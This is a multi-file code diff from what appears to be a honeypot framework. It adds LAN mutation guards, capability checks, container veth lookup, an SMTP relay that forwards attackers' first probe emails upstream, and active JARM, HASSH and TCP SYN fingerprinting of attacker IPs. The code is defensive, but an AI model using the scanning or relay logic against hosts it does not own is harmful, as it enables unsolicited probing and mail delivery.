"""Update LAN fields — subnet, is_dmz, coords, rename.""" """Update LAN fields — subnet, is_dmz, coords, rename.
Guard rail: ``subnet`` and ``is_dmz`` are pinned at deploy time.
Live deckies bind to the bridge with IPs allocated from the old
subnet (and ``is_dmz`` flips swap the bridge's ``internal=False``
flag, which docker can't change on a network with active
containers). Reject those mutations on active/degraded topologies
rather than rewriting the DB into an incoherent state.
Coord-only updates (``x``/``y``) are layout-only; let them through
unconditionally. Renames pass through too — the bridge's docker
name is keyed off ``_network_name(topology_id, lan_name)``, so a
rename would also need a rebuild — but rename isn't currently a
code path on active topologies; if the operator hits it we still
write the row and let the next deploy reconcile.
"""
hydrated = await _hydrated(repo, topology_id) hydrated = await _hydrated(repo, topology_id)
lan = _lan_by_name(hydrated, payload["name"]) lan = _lan_by_name(hydrated, payload["name"])
if lan is None: if lan is None:
@@ -389,6 +1017,17 @@ async def apply_update_lan(
fields[key] = payload[key] fields[key] = payload[key]
if not fields: if not fields:
return return
topology = await repo.get_topology(topology_id)
is_live = bool(topology) and topology.status in ("active", "degraded")
if is_live:
hostile = {"subnet", "is_dmz"} & fields.keys()
if hostile:
raise MutationError(
f"cannot change {sorted(hostile)} on a deployed LAN; "
f"teardown + redeploy required"
)
await repo.update_lan(lan["id"], fields) await repo.update_lan(lan["id"], fields)
await _assert_valid_after(repo, topology_id) await _assert_valid_after(repo, topology_id)

View File

@@ -151,11 +151,20 @@ def _ensure_network(
options.update(extra_options) options.update(extra_options)
for net in client.networks.list(names=[MACVLAN_NETWORK_NAME]): for net in client.networks.list(names=[MACVLAN_NETWORK_NAME]):
# networks.list() doesn't populate Containers — reload to get the
# full inspect payload (including connected container IDs).
try:
net.reload()
except docker.errors.APIError:
pass
if net.attrs.get("Driver") == driver: if net.attrs.get("Driver") == driver:
# Same driver — but if the IPAM pool drifted (different subnet, # Same driver — but if the IPAM pool drifted (different subnet,
# gateway, or ip-range than this deploy asks for), reusing it # gateway, or ip-range than this deploy asks for), reusing it
# hands out addresses from the old pool and we race the real LAN. # hands out addresses from the old pool and we race the real LAN.
# Compare and rebuild on mismatch. # Compare and rebuild on mismatch — but only when no containers
# are attached. With active endpoints Docker refuses the remove
# with 403; just attach to the existing network instead.
pools = (net.attrs.get("IPAM") or {}).get("Config") or [] pools = (net.attrs.get("IPAM") or {}).get("Config") or []
cur = pools[0] if pools else {} cur = pools[0] if pools else {}
if ( if (
@@ -164,8 +173,15 @@ def _ensure_network(
and cur.get("IPRange") == ip_range and cur.get("IPRange") == ip_range
): ):
return # right driver AND matching pool, leave it alone return # right driver AND matching pool, leave it alone
# Driver mismatch OR IPAM drift — tear it down. Disconnect any live if net.attrs.get("Containers"):
# containers first so `remove()` doesn't refuse with ErrNetworkInUse. # Active endpoints — can't safely rebuild. Attach to the
# existing network; IPAM drift on ip_range only affects
# Docker's auto-assign pool, which DECNET doesn't use
# (IPs are always set explicitly in the compose file).
return
# Driver mismatch OR empty-endpoint IPAM drift — tear it down.
# Disconnect any live containers first so `remove()` doesn't
# refuse with ErrNetworkInUse.
for cid in (net.attrs.get("Containers") or {}): for cid in (net.attrs.get("Containers") or {}):
try: try:
net.disconnect(cid, force=True) net.disconnect(cid, force=True)
@@ -303,11 +319,44 @@ def remove_bridge_network(client: docker.DockerClient, name: str) -> None:
# Host-side macvlan interface (hairpin fix) # Host-side macvlan interface (hairpin fix)
# --------------------------------------------------------------------------- # ---------------------------------------------------------------------------
def _require_root() -> None: # Linux capability bit positions — see capabilities(7).
if os.geteuid() != 0: _CAP_NET_ADMIN = 12
raise PermissionError(
"MACVLAN host-side interface setup requires root. Run with sudo."
) def _has_cap_net_admin() -> bool:
"""True if the current process holds CAP_NET_ADMIN in its effective set.
Reads ``/proc/self/status`` rather than calling ``capget(2)`` so we
don't need a libcap dependency. ``CapEff`` is a 64-bit hex bitmask;
bit 12 is CAP_NET_ADMIN.
"""
try:
with open("/proc/self/status", "r") as fh:
for line in fh:
if line.startswith("CapEff:"):
bits = int(line.split()[1], 16)
return bool(bits & (1 << _CAP_NET_ADMIN))
except OSError:
pass
return False
def _require_net_admin() -> None:
"""Reject early if the process can't run ``ip link add ... macvlan``.
CAP_NET_ADMIN is what the kernel actually checks for netlink RTM_NEWLINK
of a macvlan/ipvlan slave; euid==0 is sufficient (it grants every cap)
but not necessary. Prefer the cap check so the systemd unit's
``AmbientCapabilities=CAP_NET_ADMIN`` is honoured without forcing the
whole API to run as root.
"""
if os.geteuid() == 0 or _has_cap_net_admin():
return
raise PermissionError(
"MACVLAN host-side interface setup needs CAP_NET_ADMIN. "
"Either run as root or grant the cap (systemd: "
"AmbientCapabilities=CAP_NET_ADMIN)."
)
def setup_host_macvlan(interface: str, host_macvlan_ip: str, decky_ip_range: str) -> None: def setup_host_macvlan(interface: str, host_macvlan_ip: str, decky_ip_range: str) -> None:
@@ -317,7 +366,9 @@ def setup_host_macvlan(interface: str, host_macvlan_ip: str, decky_ip_range: str
host-helper first: the two drivers can share a parent NIC on paper but host-helper first: the two drivers can share a parent NIC on paper but
leaving the opposite helper in place is just cruft after a driver swap. leaving the opposite helper in place is just cruft after a driver swap.
""" """
_require_root() _require_net_admin()
_run(["ip", "link", "del", HOST_IPVLAN_IFACE], check=False)
_run(["ip", "link", "del", HOST_IPVLAN_IFACE], check=False) _run(["ip", "link", "del", HOST_IPVLAN_IFACE], check=False)
@@ -332,7 +383,7 @@ def setup_host_macvlan(interface: str, host_macvlan_ip: str, decky_ip_range: str
def teardown_host_macvlan(decky_ip_range: str) -> None: def teardown_host_macvlan(decky_ip_range: str) -> None:
_require_root() _require_net_admin()
_run(["ip", "route", "del", decky_ip_range, "dev", HOST_MACVLAN_IFACE], check=False) _run(["ip", "route", "del", decky_ip_range, "dev", HOST_MACVLAN_IFACE], check=False)
_run(["ip", "link", "del", HOST_MACVLAN_IFACE], check=False) _run(["ip", "link", "del", HOST_MACVLAN_IFACE], check=False)
@@ -344,7 +395,9 @@ def setup_host_ipvlan(interface: str, host_ipvlan_ip: str, decky_ip_range: str)
host-helper first so a prior macvlan deploy doesn't leave its slave host-helper first so a prior macvlan deploy doesn't leave its slave
dangling on the parent NIC after the driver swap. dangling on the parent NIC after the driver swap.
""" """
_require_root() _require_net_admin()
_run(["ip", "link", "del", HOST_MACVLAN_IFACE], check=False)
_run(["ip", "link", "del", HOST_MACVLAN_IFACE], check=False) _run(["ip", "link", "del", HOST_MACVLAN_IFACE], check=False)
@@ -358,7 +411,7 @@ def setup_host_ipvlan(interface: str, host_ipvlan_ip: str, decky_ip_range: str)
def teardown_host_ipvlan(decky_ip_range: str) -> None: def teardown_host_ipvlan(decky_ip_range: str) -> None:
_require_root() _require_net_admin()
_run(["ip", "route", "del", decky_ip_range, "dev", HOST_IPVLAN_IFACE], check=False) _run(["ip", "route", "del", decky_ip_range, "dev", HOST_IPVLAN_IFACE], check=False)
_run(["ip", "link", "del", HOST_IPVLAN_IFACE], check=False) _run(["ip", "link", "del", HOST_IPVLAN_IFACE], check=False)
@@ -378,3 +431,47 @@ def ips_to_range(ips: list[str]) -> str:
strict=False, strict=False,
) )
return str(network) return str(network)
# ---------------------------------------------------------------------------
# Container veth resolution (for tc netem tarpit)
# ---------------------------------------------------------------------------
def get_container_pid(container_name: str) -> int:
"""Return the PID of a running container's init process."""
client = docker.from_env()
try:
container = client.containers.get(container_name)
except docker.errors.NotFound:
raise LookupError(f"container {container_name!r} not found")
pid = container.attrs["State"]["Pid"]
if not pid:
raise LookupError(f"container {container_name!r} is not running (PID=0)")
return pid
def get_container_veth(container_name: str) -> str:
"""Return the host veth interface name paired to container_name's eth0.
Reads /sys/class/net/eth0/iflink from inside the container to get the
peer interface index, then matches it against ``ip link show`` on the host.
Requires no nsenter and no elevated privileges beyond what Docker exec grants.
"""
result = _run(
["docker", "exec", container_name, "cat", "/sys/class/net/eth0/iflink"],
check=False,
)
if result.returncode != 0:
raise LookupError(
f"container {container_name!r} not reachable: {result.stderr.strip()}"
)
peer_index = result.stdout.strip()
links = _run(["ip", "link", "show"])
for line in links.stdout.splitlines():
if line.startswith(f"{peer_index}:"):
# Format: "42: veth3a4b5c@if41: <BROADCAST,...>"
iface = line.split(":")[1].strip().split("@")[0]
return iface
raise LookupError(
f"no host veth found for container {container_name!r} (peer ifindex {peer_index})"
)

View File

@@ -65,7 +65,7 @@ def get_driver_for(action: Action) -> ActivityDriver:
try: try:
from decnet.orchestrator.emailgen.scheduler import EmailAction from decnet.orchestrator.emailgen.scheduler import EmailAction
except ImportError: # pragma: no cover - scheduler always exists except ImportError: # pragma: no cover - scheduler always exists
EmailAction = None # type: ignore[assignment] EmailAction = None # type: ignore[assignment, misc]
if EmailAction is not None and isinstance(action, EmailAction): if EmailAction is not None and isinstance(action, EmailAction):
from decnet.orchestrator.drivers.email import EmailDriver from decnet.orchestrator.drivers.email import EmailDriver
return EmailDriver() return EmailDriver()

View File

@@ -176,7 +176,7 @@ class EmailDriver(ActivityDriver):
"""Convenience accessor for telemetry / logging.""" """Convenience accessor for telemetry / logging."""
return self._llm.model return self._llm.model
async def run(self, action: EmailAction) -> ActivityResult: async def run(self, action: EmailAction) -> ActivityResult: # type: ignore[override]
return await self._run_email(action) return await self._run_email(action)
async def _run_email(self, action: EmailAction) -> ActivityResult: async def _run_email(self, action: EmailAction) -> ActivityResult:

View File

@@ -0,0 +1,80 @@
"""SMTP probe-relay driver.
Forwards the attacker's first probe email via the master's real internet
connection. The smtp_relay decky runs on MACVLAN and has no gateway access;
the master (where this worker runs) does.
Called by the realism worker's smtp probe listener, not the main tick loop.
"""
from __future__ import annotations
import email
import smtplib
from pathlib import Path
from typing import Any
_ARTIFACTS_ROOT_DEFAULT = "/var/lib/decnet/artifacts"
def _ensure_from_header(body: bytes, mail_from: str) -> bytes:
"""Return body with a From: header added if one is absent."""
try:
msg = email.message_from_bytes(body)
except Exception:
return body
if msg["From"]:
return body
# Prepend the header before the existing content.
header_line = f"From: {mail_from}\r\n".encode()
return header_line + body
def forward_probe(
*,
svc_cfg: dict[str, Any],
stored_as: str,
decky_name: str,
mail_from: str,
rcpt_to: list[str],
artifacts_root: str = _ARTIFACTS_ROOT_DEFAULT,
) -> tuple[bool, str]:
"""Read the .eml from disk and forward it via the upstream relay.
Returns (True, "") on success or (False, reason) on failure.
Always safe to call in a thread — uses only blocking I/O.
"""
upstream_host = (svc_cfg.get("upstream_host") or "").strip()
if not upstream_host:
return False, "upstream_host not configured"
eml_path = Path(artifacts_root) / decky_name / "smtp" / stored_as
try:
body = eml_path.read_bytes()
except OSError as exc:
return False, f"cannot read eml: {exc}"
if not rcpt_to:
return False, "no recipients"
upstream_port = int(svc_cfg.get("upstream_port") or 25)
upstream_user = (svc_cfg.get("upstream_user") or "").strip()
upstream_pass = (svc_cfg.get("upstream_pass") or "").strip()
envelope_from = (svc_cfg.get("upstream_sender") or "").strip() or mail_from
# Ensure the message has a From: header so mail clients show the attacker's
# address rather than falling back to the envelope sender (upstream_sender).
# Minimal relay-test scripts often omit headers entirely.
body = _ensure_from_header(body, mail_from)
try:
with smtplib.SMTP(upstream_host, upstream_port, timeout=15) as conn:
conn.ehlo()
if conn.has_extn("STARTTLS"):
conn.starttls()
conn.ehlo()
if upstream_user and upstream_pass:
conn.login(upstream_user, upstream_pass)
conn.sendmail(envelope_from, rcpt_to, body)
return True, ""
except Exception as exc:
return False, str(exc)[:256]

View File

@@ -18,11 +18,8 @@ or IP can't escape into a shell.
from __future__ import annotations from __future__ import annotations
import asyncio import asyncio
import shlex
from typing import Any from typing import Any
from datetime import datetime
import base64
from datetime import datetime, timezone
from decnet.logging import get_logger from decnet.logging import get_logger
from decnet.orchestrator.drivers.base import ActivityDriver, ActivityResult from decnet.orchestrator.drivers.base import ActivityDriver, ActivityResult
@@ -226,36 +223,24 @@ class SSHDriver(ActivityDriver):
) -> ActivityResult: ) -> ActivityResult:
"""Write *content* to *path* inside *decky_name*'s ssh container. """Write *content* to *path* inside *decky_name*'s ssh container.
Streams base64 via stdin (mirrors :mod:`decnet.canary.planter`'s Delegates to :func:`decnet.decky_io.write_file_to_container`,
ARG_MAX-safe write — see commit c17b9e0). Sets file mode and, which carries the ARG_MAX-safe base64-via-stdin trick. Sets
when *mtime* is provided, ``touch -d`` to backdate the file so file mode and, when *mtime* is provided, ``touch -d`` to
it doesn't all stamp at wall-clock-now (the realism failure backdate the file (otherwise everything stamps at wall-clock-now
this migration is fixing). — the realism failure this path was originally fixing).
""" """
from decnet.decky_io import write_file_to_container
container = _container_for(decky_name) container = _container_for(decky_name)
b64 = base64.b64encode(content).decode("ascii") success, error = await write_file_to_container(
# touch -d accepts ISO 8601; we always emit UTC so the container, path, content, mode=mode, mtime=mtime, timeout=_TIMEOUT,
# container's local TZ doesn't drift the mtime.
if mtime is not None:
ts = mtime.astimezone(timezone.utc).strftime("%Y-%m-%d %H:%M:%S UTC")
touch_cmd = f"touch -d {shlex.quote(ts)} {shlex.quote(path)}"
else:
touch_cmd = f"touch {shlex.quote(path)}"
sh_cmd = (
f"mkdir -p {shlex.quote(_dirname(path))} && "
f"base64 -d > {shlex.quote(path)} && "
f"chmod {mode:o} {shlex.quote(path)} && "
f"{touch_cmd}"
) )
argv = [_DOCKER, "exec", "-i", container, "sh", "-c", sh_cmd]
rc, _stdout, stderr = await _run_with_stdin(argv, b64.encode("ascii"))
success = rc == 0
payload: dict[str, Any] = { payload: dict[str, Any] = {
"dst_decky": decky_name, "dst_decky": decky_name,
"path": path, "path": path,
"bytes": len(content), "bytes": len(content),
"rc": rc, "rc": 0 if success else 1,
"stderr": stderr.strip()[:256] if not success else None, "stderr": error if not success else None,
} }
return ActivityResult(success=success, payload=payload) return ActivityResult(success=success, payload=payload)
@@ -283,11 +268,3 @@ class SSHDriver(ActivityDriver):
) )
def _dirname(path: str) -> str:
"""Pure-string dirname. We can't trust ``os.path.dirname`` on the
host to share the destination container's separator semantics, but
deckies are POSIX so a plain ``rfind('/')`` suffices."""
idx = path.rfind("/")
if idx <= 0:
return "/"
return path[:idx]

View File

@@ -131,13 +131,13 @@ async def _resolve_personas(
topology = await repo.get_topology(topology_id) topology = await repo.get_topology(topology_id)
if not topology: if not topology:
return [], source return [], source
return ( if isinstance(topology, dict):
parse_personas( raw = topology.get("email_personas")
topology.get("email_personas"), lang = topology.get("language_default") or "en"
language_default=topology.get("language_default") or "en", else:
), raw = topology.email_personas
source, lang = topology.language_default or "en"
) return parse_personas(raw, language_default=lang), source
# Fleet / shard / anything else → global pool. # Fleet / shard / anything else → global pool.
return global_pool.load(), source return global_pool.load(), source
@@ -175,7 +175,7 @@ async def pick(
) )
return None return None
active = [p for p in personas if in_active_hours(p, now_dt.hour)] active = [p for p in personas if in_active_hours(p, now_dt)]
if len(active) < 2: if len(active) < 2:
logger.debug( logger.debug(
"emailgen pick: source=%s mail_decky=%s only %d personas in-hours", "emailgen pick: source=%s mail_decky=%s only %d personas in-hours",

View File

@@ -311,17 +311,22 @@ async def _resolve_personas(
return enriched return enriched
def _topology_personas(topology: Optional[dict[str, Any]]) -> list[EmailPersona]: def _topology_personas(topology) -> list[EmailPersona]:
if not topology: if not topology:
return [] return []
raw = topology.get("email_personas") if isinstance(topology, dict):
raw = topology.get("email_personas")
lang = topology.get("language_default") or "en"
else:
raw = topology.email_personas
lang = topology.language_default or "en"
if raw is None: if raw is None:
return [] return []
if isinstance(raw, list): if isinstance(raw, list):
return parse_personas(raw, language_default=topology.get("language_default") or "en") return parse_personas(raw, language_default=lang)
if isinstance(raw, str): if isinstance(raw, str):
try: try:
return parse_personas(json.loads(raw), language_default=topology.get("language_default") or "en") return parse_personas(json.loads(raw), language_default=lang)
except json.JSONDecodeError: except json.JSONDecodeError:
return [] return []
return [] return []

View File

@@ -25,6 +25,7 @@ import secrets
from datetime import datetime, timezone from datetime import datetime, timezone
from typing import Any, Optional from typing import Any, Optional
from decnet.bus import topics as _topics
from decnet.bus.factory import get_bus from decnet.bus.factory import get_bus
from decnet.bus.publish import ( from decnet.bus.publish import (
publish_safely, publish_safely,
@@ -34,6 +35,7 @@ from decnet.bus.publish import (
from decnet.logging import get_logger from decnet.logging import get_logger
from decnet.orchestrator import events, scheduler from decnet.orchestrator import events, scheduler
from decnet.orchestrator.drivers import get_driver_for from decnet.orchestrator.drivers import get_driver_for
from decnet.orchestrator.drivers.smtp_relay import forward_probe
from decnet.orchestrator.emailgen import ( from decnet.orchestrator.emailgen import (
events as email_events, events as email_events,
scheduler as email_scheduler, scheduler as email_scheduler,
@@ -127,6 +129,7 @@ async def orchestrator_worker(
# operator's intent rather than the baked-in defaults. A failure # operator's intent rather than the baked-in defaults. A failure
# here logs and falls through; the planner already holds defaults. # here logs and falls through; the planner already holds defaults.
await _refresh_realism_config(repo) await _refresh_realism_config(repo)
await _refresh_llm_config(repo)
shutdown = asyncio.Event() shutdown = asyncio.Event()
heartbeat_task = asyncio.create_task( heartbeat_task = asyncio.create_task(
@@ -138,6 +141,9 @@ async def orchestrator_worker(
control_task = asyncio.create_task( control_task = asyncio.create_task(
run_control_listener(bus, "orchestrator", shutdown), run_control_listener(bus, "orchestrator", shutdown),
) )
probe_task = asyncio.create_task(
_run_smtp_probe_listener(repo, shutdown),
)
tick_n = 0 tick_n = 0
try: try:
while not shutdown.is_set(): while not shutdown.is_set():
@@ -156,8 +162,9 @@ async def orchestrator_worker(
await _periodic_prune(repo) await _periodic_prune(repo)
if tick_n % _REALISM_CONFIG_REFRESH_TICKS == 0: if tick_n % _REALISM_CONFIG_REFRESH_TICKS == 0:
await _refresh_realism_config(repo) await _refresh_realism_config(repo)
await _refresh_llm_config(repo)
finally: finally:
for t in (heartbeat_task, control_task): for t in (heartbeat_task, control_task, probe_task):
t.cancel() t.cancel()
with contextlib.suppress(Exception, asyncio.CancelledError): with contextlib.suppress(Exception, asyncio.CancelledError):
await t await t
@@ -218,6 +225,18 @@ async def _refresh_realism_config(repo: BaseRepository) -> None:
logger.warning("realism config refresh: rejected payload: %s", exc) logger.warning("realism config refresh: rejected payload: %s", exc)
async def _refresh_llm_config(repo: BaseRepository) -> None:
"""Pull operator-tuned LLM config from realism_config into the backend cache."""
from decnet.realism.llm.config import apply, load_from_db
cfg = await load_from_db(repo)
if cfg is None:
return
try:
apply(cfg)
except Exception as exc: # noqa: BLE001
logger.warning("llm config refresh: apply failed: %s", exc)
def _roll_action_kind(rng: secrets.SystemRandom) -> str: def _roll_action_kind(rng: secrets.SystemRandom) -> str:
total = sum(w for _, w in _ACTION_WEIGHTS) total = sum(w for _, w in _ACTION_WEIGHTS)
target = rng.randint(1, total) target = rng.randint(1, total)
@@ -303,7 +322,7 @@ async def _pick_action(
) )
elif kind == "email": elif kind == "email":
try: try:
action = await email_scheduler.pick(repo, rand=rng) action = await email_scheduler.pick(repo, rand=rng) # type: ignore[assignment]
except Exception as exc: # noqa: BLE001 except Exception as exc: # noqa: BLE001
logger.debug("orchestrator: email pick failed: %s", exc) logger.debug("orchestrator: email pick failed: %s", exc)
action = None action = None
@@ -467,6 +486,100 @@ async def _bump_synthetic_file_after_edit(repo, action, result) -> None:
await repo.update_synthetic_file(action.synthetic_file_uuid, patch) await repo.update_synthetic_file(action.synthetic_file_uuid, patch)
async def _run_smtp_probe_listener(
repo: BaseRepository,
shutdown: asyncio.Event,
) -> None:
"""Subscribe to smtp.probe.pending and forward probe emails upstream.
Runs as a long-lived subtask alongside the tick loop. When a probe lands
we check if this (attacker_ip, decky) has already been forwarded up to
probe_limit times — if not, forward via the master's real internet
connection and store a probe_relay bounty with the result.
"""
try:
bus = get_bus(client_name="orchestrator-probe")
await bus.connect()
sub = bus.subscribe(_topics.smtp("probe.pending"))
async with sub:
async for event in sub:
if shutdown.is_set():
break
try:
await _handle_probe_pending(repo, event.payload)
except Exception as exc: # noqa: BLE001
logger.warning("smtp probe listener: handle error: %s", exc)
except asyncio.CancelledError:
raise
except Exception as exc: # noqa: BLE001
logger.warning("smtp probe listener: bus unavailable: %s", exc)
finally:
with contextlib.suppress(Exception):
await bus.close()
async def _handle_probe_pending(repo: BaseRepository, payload: dict) -> None:
decky_name = (payload.get("decky") or "").strip()
attacker_ip = (payload.get("attacker_ip") or "").strip()
stored_as = (payload.get("stored_as") or "").strip()
mail_from = (payload.get("mail_from") or "").strip()
rcpt_to_raw = (payload.get("rcpt_to") or "").strip()
if not (decky_name and attacker_ip and stored_as):
return
decky_row = await repo.get_fleet_decky_by_name(decky_name)
if not decky_row:
return
svc_cfg = (
(decky_row.get("decky_config") or {})
.get("service_config", {})
.get("smtp_relay") or {}
)
if not (svc_cfg.get("upstream_host") or "").strip():
return
probe_limit = int(svc_cfg.get("probe_limit") or 1)
already_sent = await repo.count_probe_relays(attacker_ip, decky_name)
if already_sent >= probe_limit:
return
rcpt_to = [r.strip() for r in rcpt_to_raw.split(",") if r.strip()]
artifacts_root = os.environ.get("DECNET_ARTIFACTS_ROOT", "/var/lib/decnet/artifacts")
loop = asyncio.get_event_loop()
ok, reason = await loop.run_in_executor(
None,
lambda: forward_probe(
svc_cfg=svc_cfg,
stored_as=stored_as,
decky_name=decky_name,
mail_from=mail_from,
rcpt_to=rcpt_to,
artifacts_root=artifacts_root,
),
)
await repo.add_bounty({
"decky": decky_name,
"service": "smtp_relay",
"attacker_ip": attacker_ip,
"bounty_type": "probe_relay",
"payload": {
"stored_as": stored_as,
"forwarded": ok,
**({"fwd_error": reason} if not ok else {}),
},
})
if ok:
logger.info("smtp probe forwarded decky=%s ip=%s", decky_name, attacker_ip)
else:
logger.warning(
"smtp probe forward failed decky=%s ip=%s error=%s",
decky_name, attacker_ip, reason,
)
async def _record_synthetic_file(repo, action) -> None: async def _record_synthetic_file(repo, action) -> None:
"""Persist (or patch) a synthetic_files row after a FileAction plant. """Persist (or patch) a synthetic_files row after a FileAction plant.

View File

@@ -48,7 +48,7 @@ def _send_syn(
Craft a TCP SYN with common options and send it. Returns the Craft a TCP SYN with common options and send it. Returns the
SYN-ACK response packet or None on timeout/failure. SYN-ACK response packet or None on timeout/failure.
""" """
from scapy.all import IP, TCP, conf, sr1 from scapy.all import IP, TCP, conf, sr1 # type: ignore[attr-defined]
# Suppress scapy's noisy output # Suppress scapy's noisy output
conf.verb = 0 conf.verb = 0
@@ -83,7 +83,7 @@ def _send_syn(
return None return None
# Verify it's a SYN-ACK (flags == 0x12) # Verify it's a SYN-ACK (flags == 0x12)
from scapy.all import TCP as TCPLayer from scapy.all import TCP as TCPLayer # type: ignore[attr-defined]
if not resp.haslayer(TCPLayer): if not resp.haslayer(TCPLayer):
return None return None
if resp[TCPLayer].flags != 0x12: # SYN-ACK if resp[TCPLayer].flags != 0x12: # SYN-ACK
@@ -103,7 +103,7 @@ def _send_rst(
) -> None: ) -> None:
"""Send RST to clean up the half-open connection.""" """Send RST to clean up the half-open connection."""
try: try:
from scapy.all import IP, TCP, send from scapy.all import IP, TCP, send # type: ignore[attr-defined]
rst = ( rst = (
IP(dst=host) IP(dst=host)
/ TCP( / TCP(
@@ -124,7 +124,7 @@ def _parse_synack(resp: Any) -> dict[str, Any]:
""" """
Extract fingerprint fields from a scapy SYN-ACK response packet. Extract fingerprint fields from a scapy SYN-ACK response packet.
""" """
from scapy.all import IP, TCP from scapy.all import IP, TCP # type: ignore[attr-defined]
ip_layer = resp[IP] ip_layer = resp[IP]
tcp_layer = resp[TCP] tcp_layer = resp[TCP]

View File

@@ -27,6 +27,9 @@ from datetime import datetime, timezone
from pathlib import Path from pathlib import Path
from typing import Any, Callable from typing import Any, Callable
from sqlalchemy.engine import Engine
from sqlmodel import Session
from decnet.bus import topics as _topics from decnet.bus import topics as _topics
from decnet.bus.base import BaseBus from decnet.bus.base import BaseBus
from decnet.bus.factory import get_bus from decnet.bus.factory import get_bus
@@ -35,6 +38,10 @@ from decnet.bus.publish import (
run_control_listener, run_control_listener,
run_health_heartbeat, run_health_heartbeat,
) )
from decnet.correlation.fingerprint_rotation import (
ProbeType,
record_fingerprint,
)
from decnet.logging import get_logger from decnet.logging import get_logger
from decnet.prober.hassh import hassh_server from decnet.prober.hassh import hassh_server
from decnet.prober.jarm import JARM_EMPTY_HASH, jarm_hash from decnet.prober.jarm import JARM_EMPTY_HASH, jarm_hash
@@ -44,6 +51,21 @@ from decnet.telemetry import traced as _traced
logger = get_logger("prober") logger = get_logger("prober")
def _build_sync_engine() -> Engine:
"""Construct a sync SQLite engine for rotation-detection state.
Used inline by the prober; it lives outside the async repository
layer because rotation detection is a sync hook on a sync probe
path. Honors the same defaulting as
``decnet.web.db.sqlite.repository.SQLiteRepository``.
"""
import os
from decnet.config import _ROOT
from decnet.web.db.sqlite.database import get_sync_engine
db_path = os.environ.get("DECNET_DB_PATH", str(_ROOT / "decnet.db"))
return get_sync_engine(db_path)
# ─── Default ports per probe type ─────────────────────────────────────────── # ─── Default ports per probe type ───────────────────────────────────────────
# JARM: common C2 callback / TLS server ports # JARM: common C2 callback / TLS server ports
@@ -233,6 +255,14 @@ def _discover_attackers(json_path: Path, position: int) -> tuple[set[str], int]:
ProbePublishFn = Callable[[str, dict[str, Any]], None] ProbePublishFn = Callable[[str, dict[str, Any]], None]
# Rotation recorder: takes (attacker_ip, port, probe_type, new_hash) and
# performs the rotation-detection upsert + derived-event emission for the
# DEBT-032 substrate-fingerprint flow. Optional; when None the prober
# behaves exactly as before (raw fingerprint emit only, no rotation
# detection). Construction lives at worker startup so phase functions
# don't have to know about the DB engine.
RotationRecorderFn = Callable[[str, int, "ProbeType", str], None]
@_traced("prober.probe_cycle") @_traced("prober.probe_cycle")
def _probe_cycle( def _probe_cycle(
@@ -245,6 +275,7 @@ def _probe_cycle(
json_path: Path, json_path: Path,
timeout: float = 5.0, timeout: float = 5.0,
publish_fn: ProbePublishFn | None = None, publish_fn: ProbePublishFn | None = None,
record_rotation: RotationRecorderFn | None = None,
) -> None: ) -> None:
""" """
Probe all known attacker IPs with JARM, HASSH, and TCP/IP fingerprinting. Probe all known attacker IPs with JARM, HASSH, and TCP/IP fingerprinting.
@@ -263,13 +294,13 @@ def _probe_cycle(
ip_probed = probed.setdefault(ip, {}) ip_probed = probed.setdefault(ip, {})
# Phase 1: JARM (TLS fingerprinting) # Phase 1: JARM (TLS fingerprinting)
_jarm_phase(ip, ip_probed, jarm_ports, log_path, json_path, timeout, publish_fn) _jarm_phase(ip, ip_probed, jarm_ports, log_path, json_path, timeout, publish_fn, record_rotation)
# Phase 2: HASSHServer (SSH fingerprinting) # Phase 2: HASSHServer (SSH fingerprinting)
_hassh_phase(ip, ip_probed, ssh_ports, log_path, json_path, timeout, publish_fn) _hassh_phase(ip, ip_probed, ssh_ports, log_path, json_path, timeout, publish_fn, record_rotation)
# Phase 3: TCP/IP stack fingerprinting # Phase 3: TCP/IP stack fingerprinting
_tcpfp_phase(ip, ip_probed, tcpfp_ports, log_path, json_path, timeout, publish_fn) _tcpfp_phase(ip, ip_probed, tcpfp_ports, log_path, json_path, timeout, publish_fn, record_rotation)
@_traced("prober.jarm_phase") @_traced("prober.jarm_phase")
@@ -281,6 +312,7 @@ def _jarm_phase(
json_path: Path, json_path: Path,
timeout: float, timeout: float,
publish_fn: ProbePublishFn | None = None, publish_fn: ProbePublishFn | None = None,
record_rotation: RotationRecorderFn | None = None,
) -> None: ) -> None:
"""JARM-fingerprint an IP on the given TLS ports.""" """JARM-fingerprint an IP on the given TLS ports."""
done = ip_probed.setdefault("jarm", set()) done = ip_probed.setdefault("jarm", set())
@@ -301,6 +333,8 @@ def _jarm_phase(
msg=f"JARM {ip}:{port} = {h}", msg=f"JARM {ip}:{port} = {h}",
) )
logger.info("prober: JARM %s:%d = %s", ip, port, h) logger.info("prober: JARM %s:%d = %s", ip, port, h)
if record_rotation is not None:
record_rotation(ip, port, "jarm", h)
if publish_fn is not None: if publish_fn is not None:
publish_fn( publish_fn(
"jarm", "jarm",
@@ -387,6 +421,7 @@ def _hassh_phase(
json_path: Path, json_path: Path,
timeout: float, timeout: float,
publish_fn: ProbePublishFn | None = None, publish_fn: ProbePublishFn | None = None,
record_rotation: RotationRecorderFn | None = None,
) -> None: ) -> None:
"""HASSHServer-fingerprint an IP on the given SSH ports.""" """HASSHServer-fingerprint an IP on the given SSH ports."""
done = ip_probed.setdefault("hassh", set()) done = ip_probed.setdefault("hassh", set())
@@ -412,6 +447,8 @@ def _hassh_phase(
msg=f"HASSH {ip}:{port} = {result['hassh_server']}", msg=f"HASSH {ip}:{port} = {result['hassh_server']}",
) )
logger.info("prober: HASSH %s:%d = %s", ip, port, result["hassh_server"]) logger.info("prober: HASSH %s:%d = %s", ip, port, result["hassh_server"])
if record_rotation is not None:
record_rotation(ip, port, "hassh", result["hassh_server"])
if publish_fn is not None: if publish_fn is not None:
publish_fn( publish_fn(
"hassh", "hassh",
@@ -445,6 +482,7 @@ def _tcpfp_phase(
json_path: Path, json_path: Path,
timeout: float, timeout: float,
publish_fn: ProbePublishFn | None = None, publish_fn: ProbePublishFn | None = None,
record_rotation: RotationRecorderFn | None = None,
) -> None: ) -> None:
"""TCP/IP stack fingerprint an IP on the given ports.""" """TCP/IP stack fingerprint an IP on the given ports."""
done = ip_probed.setdefault("tcpfp", set()) done = ip_probed.setdefault("tcpfp", set())
@@ -478,6 +516,8 @@ def _tcpfp_phase(
msg=f"TCPFP {ip}:{port} = {result['tcpfp_hash']}", msg=f"TCPFP {ip}:{port} = {result['tcpfp_hash']}",
) )
logger.info("prober: TCPFP %s:%d = %s", ip, port, result["tcpfp_hash"]) logger.info("prober: TCPFP %s:%d = %s", ip, port, result["tcpfp_hash"])
if record_rotation is not None:
record_rotation(ip, port, "tcpfp", result["tcpfp_hash"])
if publish_fn is not None: if publish_fn is not None:
publish_fn( publish_fn(
